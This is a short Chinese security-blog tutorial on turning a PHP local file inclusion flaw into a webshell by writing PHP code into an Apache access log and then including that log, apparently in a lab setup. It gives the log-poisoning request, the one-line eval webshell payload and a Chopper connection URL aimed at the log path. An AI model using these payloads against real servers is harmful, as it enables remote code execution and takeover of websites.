蜗蜗侠's Blog-关注网络安全移动版

主页 > 技术笔记 >

PHP文件包含之通过apache日志拿webshll

apache会通过日志文件记录用户的连接信息,这些信息包括ip地址、访问时间、请求类型、状态码等信息,这样我们通过访问指定的url将一句话写入到日志文件中,然后通过解析漏洞访问日志文件。
 
首先我们访问

http://10.167.99.1/<?php phpinfo()?>

找到日志文件(apache下的logs文件夹)
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 我们发现<>已经被URL编码,编码后的php语句已经不能被解析,下面我们说一下如何绕过URL的编码。
首先我们通过burpsuite设置好本地代理,做好抓包准备。
我们重新写入我们的一句话(蓝色部分)
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 发送后我们再看一下log文件
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 然后我们通过包含漏洞访问log文件 phpinfo()已经解析
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 
 如果我们将phpinfo() 换成 <?php eval($_POST['c'])?> 即可把日志文件变成一句话木马。

通过菜刀连接:http://10.167.99.1/111332.php?url=D:\phpStudy\Apache\logs\access.log

PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
成功!
(责任编辑:蜗蜗侠)